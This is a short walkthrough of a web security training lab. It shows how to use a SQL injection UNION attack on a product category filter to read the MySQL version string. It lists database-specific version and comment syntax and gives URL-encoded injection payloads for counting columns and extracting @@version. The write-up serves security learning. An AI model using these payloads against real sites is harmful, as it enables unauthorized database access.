Problem Statement :
This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
REQUIREMENT IS –
Make the database retrieve the string: ‘8.0.31-0ubuntu0.20.04.2’
Understanding: Different Database Syntax
Database versions:
You can query the database to determine its type and version. This information is useful when formulating more complicated attacks.
| Oracle | SELECT banner FROM v$version SELECT version FROM v$instance |
| Microsoft | SELECT @@version |
| PostgreSQL | SELECT version() |
| MySQL | SELECT @@version |
Comments:
You can use comments to truncate a query and remove the portion of the original query that follows your input.
| Oracle | –comment |
| Microsoft | –comment /*comment*/ |
| PostgreSQL | –comment /*comment*/ |
| MySQL | #comment — comment [Note the space after the double dash] /*comment*/ |
Steps to resolve this lab :
Note :
- To solve this LB in the browser it self, we have to Encode the # char here. Else browser will escape this char.
- In mysql we can comment using multiple methods like –, # or /* */
- First find out how many columns are there. Using ORDER by Clause.
Crafting the URL – https://0a5e005304714149c2736206009700cf.web-security-academy.net/filter?category=Pets
We are using # char to comment.
Note : Browser will escape # char so we encode it with %23
At the end of the URL type
- ‘ ORDER By 1 %23
- ‘ ORDER. By 2 %23
This will show us number of columns we have in this.
- Next is to craft the payload to get the version.
‘ UNION SELECT NULL, @@version %23
This is how it looks in Database end
- MYSQL
- Same command works on Microsoft SQL Server as well.
Scroll Unlock 